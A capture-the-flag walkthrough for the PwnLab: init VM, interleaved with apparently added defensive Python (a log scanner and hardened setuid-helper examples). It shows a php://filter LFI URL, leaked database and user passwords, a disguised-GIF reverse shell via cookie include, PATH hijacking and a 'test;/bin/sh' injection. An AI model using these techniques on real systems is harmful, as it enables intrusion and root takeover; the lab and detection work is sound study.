PWNLAB: INIT Walkthrough

Welcome to “PwnLab: init”, my first Boot2Root virtual machine. Meant to be easy, I hope you enjoy it and maybe learn something. The purpose of this CTF is to get root and read the flag.

Enumeration

There is nothing more to enumerate on ports 111, 3306 and 41649.

More Enumeration…

  1. HTTP 80
  • No manual findings in the page source or robots.txt.
  • Nothing critical from Nikto.
  • Gobuster output is given below.

Possible intrusion is through:


Finding POI (Point Of Intrusion)

We have 3 PHP files:

  1. upload.php — already accessible
  2. config.php
  3. login.php — already accessible

We can try LFI here and read the contents of config.php. Judging by the name, it most likely holds the MySQL connection details.

http://192.168.103.151/?page=php://filter/convert.base64-encode/resource=login

<?php
$server = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>

Got a few users.

Let’s decode the passwords (stored base64-encoded):

kent: Sld6WHVCSkpOeQ== -> JWzXuBJJNy
mike: U0lmZHNURW42SQ== -> SIfdsTEn6I
kane: aVN2NVltMkdSbw== -> iSv5Ym2GRo

Let’s try these credentials out:

Got access with kent:JWzXuBJJNy

Upload the reverse shell

You will get an error, since it accepts only images.

I was able to get the file uploaded, but only in image format. Hence, we need to find another way. After going through the application for some time, I found that we can use the index page for injection.

<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>

Set the lang cookie to point at the uploaded GIF.
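Both footholds used so far, the php://filter read of config.php through the page parameter and the unvalidated lang cookie passed straight into include(), leave a clear trace in the web server logs. The script below is an added example (not part of the original walkthrough or the PwnLab VM) that scans Apache-style access log lines for those two patterns. It assumes the server logs the Cookie request header as a final quoted field (an extended LogFormat; the default combined format does not include it), and the log lines, IPs and cookie values are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines: combined format plus a trailing "%{Cookie}i"
# field. Assumption: the server was configured to log the Cookie header.
SAMPLE_LOG = """\
192.168.103.10 - - [10/Jan/2024:10:00:01 +0000] "GET /?page=login HTTP/1.1" 200 1204 "-" "Mozilla/5.0" "PHPSESSID=abc123"
192.168.103.10 - - [10/Jan/2024:10:00:07 +0000] "GET /?page=php://filter/convert.base64-encode/resource=config HTTP/1.1" 200 312 "-" "Mozilla/5.0" "PHPSESSID=abc123"
192.168.103.10 - - [10/Jan/2024:10:00:15 +0000] "GET /?page=../../../../etc/passwd HTTP/1.1" 200 2048 "-" "curl/7.88" "-"
192.168.103.10 - - [10/Jan/2024:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 1204 "-" "Mozilla/5.0" "lang=en.lang.php; PHPSESSID=abc123"
192.168.103.10 - - [10/Jan/2024:10:01:09 +0000] "GET /index.php HTTP/1.1" 200 99 "-" "Mozilla/5.0" "lang=../../tmp/x.gif; PHPSESSID=abc123"
"""

# ip, timestamp, method, target, status, then referer, user-agent and cookie fields
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" "(?P<cookie>[^"]*)"$'
)

# PHP stream wrappers that should never appear in a file-include parameter
WRAPPER_RE = re.compile(r"^(php|data|expect|phar|zip|glob|file)://", re.I)
# A ".." path component anywhere in the value
TRAVERSAL_RE = re.compile(r"(^|[/\\])\.\.([/\\]|$)")
# The only value the application itself ever sets (see the commented setcookie call)
LANG_ALLOWLIST = {"en.lang.php"}


def parse_cookies(raw):
    """Split a raw Cookie header into a dict; a '-' placeholder yields {}."""
    cookies = {}
    for part in raw.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name] = value
    return cookies


def inspect_line(line):
    """Return (ip, timestamp, kind, value) findings for one log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    query = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
    for value in query.get("page", []):  # parse_qs already URL-decodes once
        if WRAPPER_RE.search(value):
            findings.append(("page-wrapper", value))
        elif TRAVERSAL_RE.search(value):
            findings.append(("page-traversal", value))
    lang = parse_cookies(m.group("cookie")).get("lang")
    if lang is not None and lang not in LANG_ALLOWLIST:
        findings.append(("lang-cookie", lang))
    return [(m.group("ip"), m.group("ts"), kind, value) for kind, value in findings]


def scan(log_text):
    """Run inspect_line over every non-empty line of a log file."""
    return [f for line in log_text.splitlines() if line.strip() for f in inspect_line(line)]


if __name__ == "__main__":
    for ip, ts, kind, value in scan(SAMPLE_LOG):
        print(f"{ts} {ip} {kind}: {value}")
```

Flagging the wrapper prefix separately from traversal matters in triage: a php://filter request against config is source disclosure and should trigger a credential rotation, while a non-allowlisted lang cookie on a 200 response means an arbitrary file was already included. The same allowlist check is the server-side fix for the index page snippet above.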

Remember to set the magic bytes on the file so that the upload is accepted. https://vk9-sec.com/local-file-upload-magic-byte-change-file-type/

Got the shell

Privilege Escalation

  1. Log in as user kane -> kane:iSv5Ym2GRo
  2. Run msgmike and we will see that cat is being executed. Hence, prepend /tmp to the PATH environment variable and add a cat file there.
  3. We will get access to mike.
  4. ./msg2root is a file in mike’s home folder. It takes input from the user; command injection is possible.
  5. Input test;/bin/sh -> you will get root.
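Steps 2 and 4 are two of the classic setuid-helper mistakes: resolving a program name through the caller's PATH, and handing user text to a shell. The walkthrough does not show the source of msgmike or msg2root, so the following is an added illustration in Python (not the binaries' code) of what the hardened versions of those two operations look like: an absolute program path with a scrubbed environment, and message text written as data rather than interpolated into a command line. The function names and file paths are hypothetical.

```python
import os
import subprocess
import tempfile

# Fixed PATH handed to every child process. The helper never inherits the
# caller's PATH, so a "cat" planted in /tmp is never consulted.
SAFE_PATH = "/usr/bin:/bin"


def sanitized_env():
    """Minimal environment for a privileged child; the caller's PATH is ignored."""
    return {"PATH": SAFE_PATH, "LANG": "C"}


def read_message_unsafe_argv(path):
    """The msgmike-style defect: a bare program name resolved via the caller's PATH.
    Returned as a list to show what would be executed; never run here."""
    return ["cat", path]


def read_message(path):
    """Hardened: absolute program path, argv list (no shell), scrubbed environment."""
    result = subprocess.run(
        ["/bin/cat", path], env=sanitized_env(), capture_output=True, text=True, check=False
    )
    return result.stdout


def append_message_unsafe_command(dest, msg):
    """The msg2root-style defect: user text pasted into a shell command line.
    Returned as a string to show what the shell would parse; never run here."""
    return "/bin/echo %s >> %s" % (msg, dest)


def append_message(dest, msg):
    """Hardened: the message is appended as file content; no shell ever sees it."""
    with open(dest, "a", encoding="utf-8") as fh:
        fh.write(msg.rstrip("\n") + "\n")
    return msg


def demo(payload="test;/bin/sh"):
    """Run the hardened helpers against the page's injection payload on a temp file."""
    fd, dest = tempfile.mkstemp(prefix="msg2root_demo_")  # constructed destination
    os.close(fd)
    try:
        append_message(dest, payload)
        with open(dest, encoding="utf-8") as fh:
            stored = fh.read()
        shown = read_message(dest)
    finally:
        os.unlink(dest)
    return {
        "stored": stored,
        "shown": shown,
        "shell_line": append_message_unsafe_command("/placeholder/messages.txt", payload),
        "path": sanitized_env()["PATH"],
    }


if __name__ == "__main__":
    os.environ["PATH"] = "/tmp:" + os.environ.get("PATH", "")  # simulate step 2
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

In the hardened path, test;/bin/sh lands in the file verbatim because nothing interprets the semicolon, and the PATH manipulation from step 2 has no effect because /bin/cat is named absolutely and the child's environment is built from scratch. The unsafe variants return the command they would have run, which makes the difference visible side by side without executing anything.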
